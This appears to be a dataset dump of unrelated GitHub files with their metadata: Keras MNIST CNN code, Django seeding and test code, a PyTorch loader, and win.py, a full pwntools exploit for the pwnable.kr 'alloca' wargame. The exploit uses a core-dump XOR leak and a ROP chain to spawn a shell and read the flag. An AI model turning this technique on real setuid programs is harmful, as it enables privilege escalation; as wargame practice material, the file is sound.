trp_log_array_entry_type = 888
trp_log_array_entry_time = 889
trp_log_array_actor = 890
trp_log_array_center_object = 891
trp_log_array_center_object_lord = 892
trp_log_array_center_object_faction = 893
trp_log_array_troop_object = 894
trp_log_array_troop_object_faction = 895
trp_log_array_faction_object = 896
trp_quick_battle_troop_1 = 897
trp_quick_battle_troop_2 = 898
trp_quick_battle_troop_3 = 899
trp_quick_battle_troop_4 = 900
trp_quick_battle_troop_5 = 901
trp_quick_battle_troop_6 = 902
trp_quick_battle_troop_7 = 903
trp_quick_battle_troop_8 = 904
trp_quick_battle_troop_9 = 905
trp_quick_battle_troop_10 = 906
trp_quick_battle_troop_11 = 907
trp_quick_battle_troops_end = 908
trp_tutorial_fighter_1 = 909
trp_tutorial_fighter_2 = 910
trp_tutorial_fighter_3 = 911
trp_tutorial_fighter_4 = 912
trp_tutorial_archer_1 = 913
trp_tutorial_master_archer = 914
trp_tutorial_rider_1 = 915
trp_tutorial_rider_2 = 916
trp_tutorial_master_horseman = 917
trp_swadian_merchant = 918
trp_vaegir_merchant = 919
trp_khergit_merchant = 920
trp_nord_merchant = 921
trp_rhodok_merchant = 922
trp_sarranid_merchant = 923
trp_startup_merchants_end = 924
trp_sea_raider_leader = 925
trp_looter_leader = 926
trp_bandit_leaders_end = 927
trp_relative_of_merchant = 928
trp_relative_of_merchants_end = 929
| [
"noreply@github.com"
] | noreply@github.com |
5dcbe0033160dc757a948a5698293f07cbd725b4 | f0485eab61a2f11325cb4369db1d6ba5b681d670 | /cnn.py | 6f3a375c46bd044d0b6bcd6490c0840f83bdba25 | [] | no_license | dalilareis/Python-neural-networks | 8c6d48fe8a04dd33f6e78e490e1e98f14b8a2f63 | c515f774743d9e5c37b71ffa2eb27611596f74ce | refs/heads/master | 2020-04-16T00:05:31.422674 | 2019-01-10T20:16:30 | 2019-01-10T20:16:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,877 | py | import numpy as np
#from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers.convolutional import Conv2D, MaxPooling2D
from keras.utils import np_utils
from keras import backend as K
K.set_image_dim_ordering('th') #pode ser 'th' ou 'tf'
import matplotlib.pyplot as plt
import utils
# fixar random seed para se poder reproduzir os resultados
seed = 9
np.random.seed(seed)
#----------------------------------------------------Etapa 1 - preparar o dataset------------------------------------------------------------------------
'''
fazer o download do MNIST dataset com imagens de digitos escritos à mão para fazer a sua classificação (já pré-preparados)
dataset: https://s3.amazonaws.com/img-datasets/mnist.npz
O ficheiro já tem tudo separado nos ficheiros {x_test.npy, x_train.npy, y_test.npy, y_train.npy}
Os atributos de entrada estão com matrizes 3D(imagem, largura,altura) e os atributos de saída é uma lista com o número correspondente
'''
def load_mnist_dataset(path):
f = np.load(path)
x_train = f['x_train']
y_train = f['y_train']
x_test = f['x_test']
y_test = f['y_test']
f.close()
return (x_train, y_train), (x_test, y_test)
#----------------------------Etapa 2 - Definir a topologia da rede (arquitectura do modelo) e compilar (convolutionary)----------------------------------
'''
- a primeira camada escondida é uma camada convolucionária chamada Convolution2D. A camada tem 32 feature maps , cada 1 de dimensão 5×5
e uma função de activação 'rectifier activation function'. Trata-se de uma camada de input, à espera de imagens com a estrutura [pixels][width][height].
- A segunda camada é de pooling que utiliza o max de MaxPooling2D. Está configurado para uma pool size de 2×2.
- A camada seguinte é de regularização que usa Dropout. Está configurado para excluir aleatoriamente 20% dos neuronios na camada para reduzir overfitting.
- A camada seguinte converte os dados da matriz 2D num vector chamado Flatten. Assim permite-se que esse output seja tratado por uma camada completamente
ligada standard.
- A camada seguinte é uma completamente ligada com 128 neuronios e uma função de activação 'rectifier activation function'.
- Finalmente a camada de saida tem 10 neuronios correspondentes às 10 classes e uma função de activação softmax para apresentar na saida uma especie
de probabilidade para cada classe.
- O modelo é treinado utilizando logarithmic loss e o algoritmo de gradient descent ADAM.
'''
def create_compile_model_cnn_simples(num_classes):
model = Sequential()
model.add(Conv2D(32, (5, 5), input_shape=(1, 28, 28), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
return model
''' criar uma rede neuronal convolucionária mais complexa.
- Convolutional layer com 30 feature maps de dimensão 5×5.
- Pooling layer que passa o máximo de 2*2 patches.
- Convolutional layer com 15 feature maps de dimensão 3×3.
- Pooling layer que passa o máximo de 2*2 patches.
- Dropout layer com probabilidade de 20%.
- Flatten layer.
- Fully connected layer com 128 neuronios e activação rectifier.
- Fully connected layer com 50 neuronios e activação rectifier.
- Output layer.
- O modelo é treinado utilizando logarithmic loss e o algoritmo de gradient descent ADAM.
'''
def create_compile_model_cnn_plus(num_classes):
model = Sequential()
model.add(Conv2D(30, (5, 5), input_shape=(1, 28, 28), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(15, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
#model.add(Dense(50, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
# Compile model
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
return model
def mnist_utilizando_cnn_simples():
    """Train and evaluate the simple CNN on the MNIST dataset.

    Loads MNIST from 'mnist.npz', reshapes/normalizes the images, one-hot
    encodes the labels, trains for 10 epochs and prints the final error.
    """
    (X_train, y_train), (X_test, y_test) = load_mnist_dataset('mnist.npz')
    # reshape to the [samples][channels][width][height] format expected by Conv2D
    X_train = X_train.reshape(X_train.shape[0], 1, 28, 28).astype('float32')
    X_test = X_test.reshape(X_test.shape[0], 1, 28, 28).astype('float32')
    # normalize the pixel values from 0-255 down to 0-1
    X_train = X_train / 255
    X_test = X_test / 255
    # one-hot encode the integer labels; e.g. 5 becomes [0. 0. 0. 0. 0. 1. 0. 0. 0. 0.]
    y_train = np_utils.to_categorical(y_train)
    y_test = np_utils.to_categorical(y_test)
    num_classes = y_test.shape[1]
    # define the network topology and compile it
    model = create_compile_model_cnn_simples(num_classes)
    utils.print_model(model,"model_simples.png")
    # train the network
    history = model.fit(X_train, y_train, validation_data=(X_test, y_test), epochs=10, batch_size=100, verbose=2)
    #print_history_accuracy(history)
    utils.print_history_loss(history)
    # final evaluation on the held-out test cases
    scores = model.evaluate(X_test, y_test, verbose=0)
    print('Scores: ', scores)
    # BUGFIX: the message used to say "MLP" although this model is a CNN
    print("Erro modelo CNN: %.2f%%" % (100-scores[1]*100))
def mnist_utilizando_cnn_plus():
    """Train and evaluate the larger CNN on the MNIST dataset.

    Same pipeline as mnist_utilizando_cnn_simples() but uses the deeper
    topology, 12 epochs and batch size 128.
    """
    (X_train, y_train), (X_test, y_test) = load_mnist_dataset('mnist.npz')
    # reshape to the [samples][channels][width][height] format expected by Conv2D
    X_train = X_train.reshape(X_train.shape[0], 1, 28, 28).astype('float32')
    X_test = X_test.reshape(X_test.shape[0], 1, 28, 28).astype('float32')
    # normalize the pixel values from 0-255 down to 0-1
    X_train = X_train / 255
    X_test = X_test / 255
    # one-hot encode the integer labels; e.g. 5 becomes [0. 0. 0. 0. 0. 1. 0. 0. 0. 0.]
    y_train = np_utils.to_categorical(y_train)
    y_test = np_utils.to_categorical(y_test)
    num_classes = y_test.shape[1]
    # define the network topology and compile it
    model = create_compile_model_cnn_plus(num_classes)
    utils.print_model(model,"model_plus.png")
    # train the network
    history = model.fit(X_train, y_train, validation_data=(X_test, y_test), epochs=12, batch_size=128, verbose=2)
    #print_history_accuracy(history)
    utils.print_history_loss(history)
    # final evaluation on the held-out test cases
    scores = model.evaluate(X_test, y_test, verbose=0)
    print('Scores: ', scores)
    # BUGFIX: the message used to say "MLP" although this model is a CNN
    print("Erro modelo CNN: %.2f%%" % (100-scores[1]*100))
#--------------------------------------------------------------MAIN--------------------------------------------------------------------------
if __name__ == '__main__':
    # Run only the enhanced CNN experiment; the simple one is kept disabled.
    #mnist_utilizando_cnn_simples()
    mnist_utilizando_cnn_plus()
| [
"39201180+dalilareis@users.noreply.github.com"
] | 39201180+dalilareis@users.noreply.github.com |
3b58eb9af84d7927459d07e03208d9b68d128309 | 5fb848b4e4b590796388ff9ae323bc29ee17ac05 | /reviews/management/commands/seed_reviews.py | 5d9a7838a40c8793c5c9c4dd756b454cddd755a0 | [] | no_license | rodom1018/airbnb-clone | 3b6d775498de87dd8094582f2731ca9b1b83b6bb | 26052dc1765789d191bc4ff0384ad2e5e5c26717 | refs/heads/master | 2023-03-06T21:12:19.996304 | 2021-02-24T16:39:06 | 2021-02-24T16:39:06 | 337,055,291 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,344 | py | import random
from django.core.management.base import BaseCommand
from django_seed import Seed
from reviews import models as review_models
from users import models as user_models
from rooms import models as room_models
class Command(BaseCommand):
    """Management command that seeds the Review table with random data."""
    help = "This command creates reviews"
    def add_arguments(self, parser):
        # Optional --number flag controlling how many reviews to create.
        parser.add_argument(
            "--number", default=1, help="How many users you want to create"
        )
    def handle(self, *args, **options):
        how_many = int(options.get("number"))
        seeder = Seed.seeder()
        all_users = user_models.User.objects.all()
        all_rooms = room_models.Room.objects.all()
        # Every rating field gets a random score in [0, 6].
        random_score = lambda x: random.randint(0, 6)
        seeder.add_entity(
            review_models.Review,
            how_many,
            {
                "accuracy": random_score,
                "communication": random_score,
                "cleanliness": random_score,
                "location": random_score,
                "check_in": random_score,
                "value": random_score,
                "room": lambda x: random.choice(all_rooms),
                "user": lambda x: random.choice(all_users),
            },
        )
        seeder.execute()
        self.stdout.write(self.style.SUCCESS("Reviews created ! "))
"enjoying1018@naver.com"
] | enjoying1018@naver.com |
699eda9c9fa27436875646f3e48e3a68b554030c | 94923becbb06260e3cd35dde46c3d1688c9f7feb | /wargames/pwnablekr/rookiss/alloca/win.py | b41641d53ba295cd19ff532a9f6708165421a956 | [
"MIT"
] | permissive | infernalheaven/examples | b1826d521b04ea5bf55c7c2b5a6cc620df59cfe9 | a3a3bfe2a7b9addea94396f21b73252c3bd56d49 | refs/heads/master | 2021-01-11T10:58:10.794931 | 2016-10-05T22:56:39 | 2016-10-05T22:56:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,582 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
# Exploit for the pwnable.kr "alloca" challenge.
# NOTE(review): this is Python 2 code — the `0755` octal literal and the
# `.next()` iterator calls below do not run on Python 3.
host = 'pwnable.kr'
user = 'alloca'
password = 'guest'
binary = '/home/%s/%s' % (user,user)
chal = os.path.basename(binary)
# SSH into the challenge box; cache the binary and its source locally.
shell = ssh(host=host, user=user, password=password, port=2222)
if not os.path.exists(chal):
    shell.download_file(binary)
    shell.download_file(binary + '.c')
    os.chmod(chal, 0755)
#
# Disable ASLR so that DSO addresses are constant.
#
context.aslr = False
#
# Using a negative value for alloca allows us to overwrite the saved value
# of ESP on the stack.
#
# The offset which gives us this control is -92, though -88 throuh -96 also
# work.
#
# Because of the way things work out, the stack value will be XORed with
# some random stack trash. On the up-side, it is consistent from run-to-run.
# On the downside, it is not consistent between different versions of libc.
#
# In order to have a portable exploit (works locally and remotely), we will
# force the target binary to crash once, and scrape the value of ESP at the
# segfault by loading a corefile.
#
# In order for a corefile to drop, we have to be in a writable directory
shell.set_working_directory()
shell('ln -s %s .' % binary)
#
# Launch the process, and let it die a terrible death
#
# Note that we need the setuid bit to be ignored in order for a corefile we
# can use to be dropped.
#
p = shell.process('./alloca',
                  setuid=0)
address = 0xdeadbeef
cookie = str(signed(address))
pattern = cyclic(64)
data = fit({0: '-92',
            16: cookie,
            32: pattern},
           filler='\n')
#
# All of the data should be sent at the same time, so that it is all
# buffered at once. The fgets() is actually a noop since the value is negative.
#
# We are relying on the buffering behavior of scanf().
#
p.sendline(data)
p.recvall()
# Grab the corefile after it's written. It may take a second or two to appear.
pause(2)
shell.download('core')
core = Core('core')
# We want to be sure that we crashed at the 'ret'
# Either we'll crash at that instruction (stack pointer is invalid)
# or at zero (stack pointer was valid, pointed at an empty page).
assert core.eip in (0x804878a, 0)
# Find out the XOR value. This is almost-always constant, but varies by 1 bit
# on the pwnable.kr server as of writing. Luckily, the 1 bit that changes is
# the '4' bit, so as long as we pad an extra 'ret' in our ROP, we're fine.
xor = address ^ core.esp
log.info("%08x xor magic" % xor)
# Find our data in the heap
address = core.search(pattern).next()
log.info("%08x heap address" % address)
#
# We need a bit of a RET sled because the XOR value isn't perfectly constant,
# but only varies by a small amount which we can account for.
#
libc = p.libc
rop = ROP(libc)
log.info("libc is at %#x" % libc.address)
binsh = libc.search('/bin/sh\x00').next()
rop.raw(rop.ret)
rop.raw(rop.ret)
rop.raw(rop.ret)
rop.raw(rop.ret)
rop.execve(binsh,0,0)
log.info(rop.dump())
# Shoot for the middle of the RET sled
address += 8
# One very last time, to pwn it proper!
cookie = str(signed(address ^ xor))
data = fit({0: '-92',
            16: cookie,
            32: str(rop)},
           filler='\n')
p = shell.process('./alloca')
# shell.upload('~/bin/gdbserver')
# shell('chmod +x gdbserver')
# p = gdb.debug('./alloca', '''
# break *0x804878a
# set follow-fork-mode child
# catch exec
# continue
# ''', ssh=shell)
p.sendline(data)
p.recvuntil('$')
p.clean()
p.sendline('cat /home/alloca/flag')
flag = p.recvline().strip()
log.success('Flag: %r' % flag)
p.interactive(prompt='')
| [
"riggle@google.com"
] | riggle@google.com |
c15923ef08c23fec06aafb4dd94a9314347fde9e | 3f227bd7695f9e8939d8a60cc087be8145b2d8c4 | /Bruning/login.py | 5c84a8e9c0c25ec5135b4d526eaa186ee700dd0e | [] | no_license | Rohit1220/website | 221ea78530a3b3e25a6e65bb7776edd1d086deec | e316d56e24a3bc2c77d555d31ed70db92fac2071 | refs/heads/main | 2023-08-24T20:12:40.614443 | 2021-10-17T03:14:53 | 2021-10-17T03:14:53 | 418,006,749 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 955 | py | from tkinter import *
from functools import partial
def validateLogin(username, password):
    """Print the credentials currently held by the two Tk StringVars."""
    entered = (("username", username.get()), ("password", password.get()))
    for field, value in entered:
        print(field, "entered :", value)
# Build the top-level window.
tkWindow = Tk()
tkWindow.geometry('400x150')
tkWindow.title('Tkinter Login Form - pythonexamples.org')
# Username label and text entry box.
# NOTE(review): .grid() returns None, so the *Label/*Entry variables below
# all hold None rather than the widgets; only the StringVars matter here.
usernameLabel = Label(tkWindow, text="User Name").grid(row=0, column=0)
username = StringVar()
usernameEntry = Entry(tkWindow, textvariable=username).grid(row=0, column=1)
# Password label and masked password entry box.
passwordLabel = Label(tkWindow,text="Password").grid(row=1, column=0)
password = StringVar()
passwordEntry = Entry(tkWindow, textvariable=password, show='*').grid(row=1, column=1)
# Bind the two StringVars into the callback so the button needs no args.
validateLogin = partial(validateLogin, username, password)
# Login button; enters the Tk event loop (blocks until the window closes).
loginButton = Button(tkWindow, text="Login", command=validateLogin).grid(row=4, column=0)
tkWindow.mainloop()
"noreply@github.com"
] | noreply@github.com |
95db0c673cf07182b0f50e3a61044670584016fd | bcc373fa3085956f776d22aaf57f5936225be1cc | /data_processing/__init__.py | a81d3f5c21079b6284e9eedbe8b6d9fc87532070 | [] | no_license | innpei/CycleGAN-cartoon-reenactment | b50180e06a50b8d28dae8d10f15485c19f5ae60c | 4bda867d42bd49796cd6aed30c03e74922660b26 | refs/heads/main | 2023-05-14T05:19:13.459522 | 2021-06-06T17:49:38 | 2021-06-06T17:49:38 | 372,128,755 | 0 | 3 | null | 2021-06-06T17:49:38 | 2021-05-30T05:12:10 | Python | UTF-8 | Python | false | false | 2,757 | py | import importlib
import torch.utils.data
from data.base_dataset import BaseDataset
def find_dataset_using_name(dataset_name):
    """Locate the dataset class for *dataset_name*.

    Imports "data/[dataset_name]_dataset.py" and returns the class whose
    name equals "<datasetname>dataset" case-insensitively and which is a
    subclass of BaseDataset. Raises NotImplementedError when no such class
    exists in the module.
    """
    module_name = "data." + dataset_name + "_dataset"
    module = importlib.import_module(module_name)
    expected = dataset_name.replace('_', '') + 'dataset'
    found = None
    for attr_name, candidate in module.__dict__.items():
        # Short-circuit: only run issubclass() on name matches, since the
        # module dict also contains non-class members.
        if attr_name.lower() == expected.lower() and issubclass(candidate, BaseDataset):
            found = candidate
    if found is None:
        raise NotImplementedError("In %s.py, there should be a subclass of BaseDataset with class name that matches %s in lowercase." % (module_name, expected))
    return found
def get_option_setter(dataset_name):
    """Return the dataset class's static <modify_commandline_options> method."""
    return find_dataset_using_name(dataset_name).modify_commandline_options
def create_dataset(opt):
    """Create a dataset given the option.

    Wraps CustomDatasetDataLoader; this is the main interface between this
    package and 'train.py'/'test.py'.

    Example:
        >>> from data import create_dataset
        >>> dataset = create_dataset(opt)
    """
    return CustomDatasetDataLoader(opt).load_data()
class CustomDatasetDataLoader():
    """Wrapper class of Dataset class that performs multi-threaded data loading"""
    def __init__(self, opt):
        """Build the dataset named by opt.dataset_mode and wrap it in a
        multi-threaded torch DataLoader."""
        self.opt = opt
        dataset_cls = find_dataset_using_name(opt.dataset_mode)
        self.dataset = dataset_cls(opt)
        print("dataset [%s] was created" % type(self.dataset).__name__)
        loader_kwargs = {
            "batch_size": opt.batch_size,
            "shuffle": not opt.serial_batches,
            "num_workers": int(opt.num_threads),
        }
        self.dataloader = torch.utils.data.DataLoader(self.dataset, **loader_kwargs)
    def load_data(self):
        """Expose this wrapper itself as the iterable dataset."""
        return self
    def __len__(self):
        """Return the number of data in the dataset, capped at max_dataset_size."""
        size = len(self.dataset)
        limit = self.opt.max_dataset_size
        return size if size < limit else limit
    def __iter__(self):
        """Yield batches until max_dataset_size samples have been served."""
        served = 0
        for batch in self.dataloader:
            if served >= self.opt.max_dataset_size:
                return
            yield batch
            served += self.opt.batch_size
| [
"noreply@github.com"
] | noreply@github.com |
96e6bd43916c8c2cec3c59ae650ad90479dfdf4c | 10c2ba04e502004e2df0dfb6c70fb83daccc1b30 | /Django/example/13-manytomany-field/main/index/tests.py | 221c544e303d6d0a99e73496308795bdfe36121c | [] | no_license | yakenohara/KnowHow | 5e79d0015220524f98d9f7c767d2a727534b612d | ccd2aed2d4bf9363136aa30778b5adf382b25c4d | refs/heads/master | 2023-04-05T09:37:14.612262 | 2023-03-26T05:56:40 | 2023-03-26T05:56:40 | 136,476,550 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 51,778 | py | import datetime
import json
import re
import textwrap
from unittest import mock
from django.core.files.base import ContentFile
from django.contrib.auth.models import User
from django.db.utils import OperationalError
from django.test import TestCase
from django.utils.timezone import make_aware
from accounts.models import TokenForRESTAPI
from authors.models import Author
from editors.models import Editor
from common.const import INT_TIMES_OF_RETRYING_CAUSE_OF_DEADLOCK, STR_ATTRIBUTE_KEYWORD_FOR_TOKEN
from index.views import makeDictFromBooks, makeDictFromBooksForRESTAPI
from index.models import Book
# Create your tests here.
class BookCreateTest(TestCase):
    """Tests for the BookCreate view (book registration form)."""
    def setUp(self):
        # Force Login
        obj_user = User.objects.create_user(
            username = 'tester',
            password = '0123'
        )
        self.client.force_login(obj_user)
        # Fixture rows the form's FK/M2M selects can reference.
        Author.objects.update_or_create(
            id = 1,
            defaults = {
                'name': 'createdAuthor',
                'birthday': None,
            }
        )
        Editor.objects.update_or_create(
            id = 1,
            defaults = {
                'name': 'createdEditor1',
                'sex': Editor.Sex.FEMALE,
            }
        )
        Editor.objects.update_or_create(
            id = 2,
            defaults = {
                'name': 'createdEditor2',
                'sex': None,
            }
        )
    def test_001(self):
        """
        Verify that the correct template file is used.
        """
        obj_response = self.client.get('/create/')
        self.assertTemplateUsed(obj_response, 'index/form.html')
    def test_002(self):
        """
        Verify redirect to the list page when book creation succeeds
        (without foreign-key references).
        """
        dict_toSaveBook = {
            'name': 'toSaveBook',
            'author': '',
            'editors': [],
        }
        obj_response = self.client.post('/create/', data = dict_toSaveBook)
        self.assertEqual(obj_response.status_code, 302)
        self.assertEqual(obj_response.url, '/')
        obj_savedBook = Book.objects.filter(name = dict_toSaveBook['name']).first()
        self.assertTrue(obj_savedBook)
        self.assertEqual(obj_savedBook.author, None)
    def test_003(self):
        """
        Verify redirect to the list page when book creation succeeds
        (with foreign-key references).
        """
        dict_toSaveBook = {
            'name': 'toSaveBook',
            'author': 1,
            'editors': [1, 2]
        }
        obj_response = self.client.post('/create/', data = dict_toSaveBook)
        self.assertEqual(obj_response.status_code, 302)
        self.assertEqual(obj_response.url, '/')
        obj_savedBook = Book.objects.filter(name = dict_toSaveBook['name']).first()
        self.assertTrue(obj_savedBook)
        self.assertEqual(obj_savedBook.author.name, 'createdAuthor')
class IndexTest(TestCase):
    """Tests for the book list (index) view."""
    def setUp(self):
        # Log in with a throwaway account so the view is reachable.
        self.client.force_login(
            User.objects.create_user(username = 'tester', password = '0123')
        )
    def test_001(self):
        """
        Verify that the book list renders the expected template and
        contains the created book's name.
        """
        created = Book.objects.create(name = 'created book')
        response = self.client.get('/')
        self.assertTemplateUsed(response, 'index/index.html')
        self.assertContains(response, created.name, status_code = 200)
class BookUpdateTest(TestCase):
    """Tests for the BookUpdate view (book edit form)."""
    def setUp(self):
        # Force Login
        obj_user = User.objects.create_user(
            username = 'tester',
            password = '0123'
        )
        self.client.force_login(obj_user)
        # The book under edit plus FK/M2M fixture rows.
        self.obj_createBook, _ = Book.objects.update_or_create(
            id = 1,
            defaults = {
                'name': 'created book',
                'author': None,
            }
        )
        Author.objects.update_or_create(
            id = 1,
            defaults = {
                'name': 'created author',
                'birthday': datetime.date(2000, 6, 10),
            }
        )
        Editor.objects.update_or_create(
            id = 1,
            defaults = {
                'name': 'createdEditor1',
                'sex': None,
            }
        )
        Editor.objects.update_or_create(
            id = 2,
            defaults = {
                'name': 'createdEditor2',
                'sex': None,
            }
        )
    def test_001(self):
        """
        Verify that the book edit page uses the correct template.
        """
        obj_response = self.client.get(f'/{self.obj_createBook.id}/update/')
        self.assertTemplateUsed(obj_response, 'index/form.html')
    def test_002(self):
        """
        Verify redirect to the correct URL after a successful edit
        (without foreign-key references).
        """
        dict_toUpdateBook = {
            'name': 'updated book',
            'author': '',
            'editors': [],
        }
        obj_response = self.client.post(f'/{self.obj_createBook.id}/update/', data = dict_toUpdateBook)
        self.assertEqual(obj_response.status_code, 302)
        self.assertEqual(obj_response.url, '/')
        self.assertTrue(Book.objects.filter(name = dict_toUpdateBook['name']).first())
    def test_003(self):
        """
        Verify redirect to the correct URL after a successful edit
        (with foreign-key references).
        """
        dict_toUpdateBook = {
            'name': 'updated book',
            'author': 1,
            'editors': [1,2],
        }
        obj_response = self.client.post(f'/{self.obj_createBook.id}/update/', data = dict_toUpdateBook)
        self.assertEqual(obj_response.status_code, 302)
        self.assertEqual(obj_response.url, '/')
        self.assertEqual(Book.objects.filter(name = dict_toUpdateBook['name']).first().author.birthday, datetime.date(2000, 6, 10))
class BookDeleteTest(TestCase):
    """Tests for the BookDelete view."""
    def setUp(self):
        # Force Login
        obj_user = User.objects.create_user(
            username = 'tester',
            password = '0123'
        )
        self.client.force_login(obj_user)
        self.obj_createdBook, _ = Book.objects.update_or_create(
            id = 1,
            defaults = {
                'name': 'created book',
                'author': None,
            }
        )
    def test_001(self):
        """
        Verify redirect to the correct URL after a successful delete,
        and that the book row is actually gone.
        """
        obj_response = self.client.delete(f'/{self.obj_createdBook.id}/delete/')
        self.assertEqual(obj_response.status_code, 302)
        self.assertEqual(obj_response.url, '/')
        # BUGFIX: this used to query Author (always empty here), so the
        # assertion passed vacuously without verifying the deletion.
        self.assertFalse(Book.objects.filter(name = self.obj_createdBook.name).first())
class makeDictFromBooksTest(TestCase):
    """Tests for the makeDictFromBooks() helper."""
    def setUp(self):
        # Authors/editors referenced by the three fixture books.
        obj_createdAuthorA, _ = Author.objects.update_or_create(
            id = 1,
            defaults = {
                'name': 'created author A',
                'birthday': datetime.date(1999, 12, 13),
            }
        )
        obj_createdAuthorB, _ = Author.objects.update_or_create(
            id = 2,
            defaults = {
                'name': 'created author B',
                'birthday': datetime.date(1999, 12, 13),
            }
        )
        obj_createdEditorA, _ = Editor.objects.update_or_create(
            id = 1,
            defaults = {
                'name': 'created editor A',
                'sex': Editor.Sex.FEMALE,
            }
        )
        obj_createdEditorB, _ = Editor.objects.update_or_create(
            id = 2,
            defaults = {
                'name': 'created editor B',
                'sex': None,
            }
        )
        self.dict_books = []
        self.dict_books.append(
            Book.objects.create(
                name = 'book A',
                author = obj_createdAuthorA
            )
        )
        self.dict_books.append(
            Book.objects.create(
                name = 'book B',
                author = obj_createdAuthorB,
            )
        )
        self.dict_books.append(
            Book.objects.create(
                name = 'book C',
                author = None,
            )
        )
        # Only book C gets editors (exercises the M2M join).
        self.dict_books[2].editors.set([obj_createdEditorA, obj_createdEditorB])
        self.dict_books[2].save()
    def test_001(self):
        """
        Convert the book list into a list of dicts
        (editors joined into one comma-separated string).
        """
        dict_expectedBooks = [
            {
                'id': 1,
                'name': 'book A',
                'author': 'created author A',
                'editors': '',
            },
            {
                'id': 2,
                'name': 'book B',
                'author': 'created author B',
                'editors': '',
            },
            {
                'id': 3,
                'name': 'book C',
                'author': '',
                'editors': 'created editor A,created editor B',
            },
        ]
        self.assertEqual(makeDictFromBooks(None, self.dict_books), dict_expectedBooks)
class makeDictFromBooksForRESTAPITest(TestCase):
    """Tests for the makeDictFromBooksForRESTAPI() helper."""
    def setUp(self):
        # Same fixtures as makeDictFromBooksTest.
        obj_createdAuthorA, _ = Author.objects.update_or_create(
            id = 1,
            defaults = {
                'name': 'created author A',
                'birthday': datetime.date(1999, 12, 13),
            }
        )
        obj_createdAuthorB, _ = Author.objects.update_or_create(
            id = 2,
            defaults = {
                'name': 'created author B',
                'birthday': datetime.date(1999, 12, 13),
            }
        )
        obj_createdEditorA, _ = Editor.objects.update_or_create(
            id = 1,
            defaults = {
                'name': 'created editor A',
                'sex': Editor.Sex.FEMALE,
            }
        )
        obj_createdEditorB, _ = Editor.objects.update_or_create(
            id = 2,
            defaults = {
                'name': 'created editor B',
                'sex': None,
            }
        )
        self.dict_books = []
        self.dict_books.append(
            Book.objects.create(
                name = 'book A',
                author = obj_createdAuthorA
            )
        )
        self.dict_books.append(
            Book.objects.create(
                name = 'book B',
                author = obj_createdAuthorB,
            )
        )
        self.dict_books.append(
            Book.objects.create(
                name = 'book C',
                author = None,
            )
        )
        # Only book C gets editors (exercises the M2M join).
        self.dict_books[2].editors.set([obj_createdEditorA, obj_createdEditorB])
        self.dict_books[2].save()
    def test_001(self):
        """
        Convert the book list into a list of dicts
        (editors returned as a list, for the REST API).
        """
        dict_expectedBooks = [
            {
                'id': 1,
                'name': 'book A',
                'author': 'created author A',
                'editors': [],
            },
            {
                'id': 2,
                'name': 'book B',
                'author': 'created author B',
                'editors': [],
            },
            {
                'id': 3,
                'name': 'book C',
                'author': '',
                'editors': [
                    'created editor A',
                    'created editor B'
                ]
            },
        ]
        self.assertEqual(makeDictFromBooksForRESTAPI(None, self.dict_books), dict_expectedBooks)
class export_as_csvTest(TestCase):
    """Tests for the CSV export view."""
    def setUp(self):
        # Force Login
        obj_user = User.objects.create_user(
            username = 'tester',
            password = '0123'
        )
        self.client.force_login(obj_user)
        obj_authorA, _ = Author.objects.update_or_create(
            id = 1,
            defaults = {
                'name': 'author A',
            }
        )
        obj_authorB, _ = Author.objects.update_or_create(
            id = 2,
            defaults = {
                'name': 'author B',
                'birthday': None,
            }
        )
        obj_authorC, _ = Author.objects.update_or_create(
            id = 3,
            defaults = {
                'name': 'author C',
                'birthday': datetime.date(2000, 10 ,13),
            }
        )
        obj_createdEditorA, _ = Editor.objects.update_or_create(
            id = 1,
            defaults = {
                'name': 'created editor A',
                'sex': Editor.Sex.FEMALE,
            }
        )
        obj_createdEditorB, _ = Editor.objects.update_or_create(
            id = 2,
            defaults = {
                'name': 'created editor B',
                'sex': None,
            }
        )
        Book.objects.update_or_create(
            id = 1,
            defaults = {
                'name': 'book A',
                'author': obj_authorA
            }
        )
        Book.objects.update_or_create(
            id = 2,
            defaults = {
                'name': 'book B',
                'author': obj_authorB
            }
        )
        Book.objects.update_or_create(
            id = 3,
            defaults = {
                'name': 'book C',
                'author': obj_authorC
            }
        )
        obj_book, _ = Book.objects.update_or_create(
            id = 4,
            defaults = {
                'name': 'book D',
                'author': None
            }
        )
        obj_book.editors.set([obj_createdEditorA, obj_createdEditorB])
        obj_book.save()
    def test_001(self):
        """
        Verify that the books are exported in CSV format.
        """
        obj_response = self.client.get('/export_as_csv/')
        self.assertEqual(obj_response.status_code, 200)
        str_expected = textwrap.dedent('''\
            ID,著書名,著者名,編集者名
            1,book A,author A,
            2,book B,author B,
            3,book C,author C,
            4,book D,,"created editor A,created editor B"
        ''')
        # Normalize newlines to `\n` before comparing.
        str_expected = re.sub(r'\r\n', r'\n', str_expected)
        str_expected = re.sub(r'\r', r'\n', str_expected)
        str_behavior = obj_response.content.decode('utf-8-sig')
        str_behavior = re.sub(r'\r\n', r'\n', str_behavior)
        str_behavior = re.sub(r'\r', r'\n', str_behavior)
        self.assertEqual(str_behavior, str_expected)
class import_from_csvTest(TestCase):
""" import_from_csv """
def setUp(self):
# Force Login
obj_user = User.objects.create_user(
username = 'tester',
password = '0123'
)
self.client.force_login(obj_user)
obj_authorA, _ = Author.objects.update_or_create(
id = 1,
defaults = {
'name': 'author A',
}
)
obj_authorB, _ = Author.objects.update_or_create(
id = 2,
defaults = {
'name': 'author B',
'birthday': None,
}
)
obj_authorC, _ = Author.objects.update_or_create(
id = 3,
defaults = {
'name': 'author C',
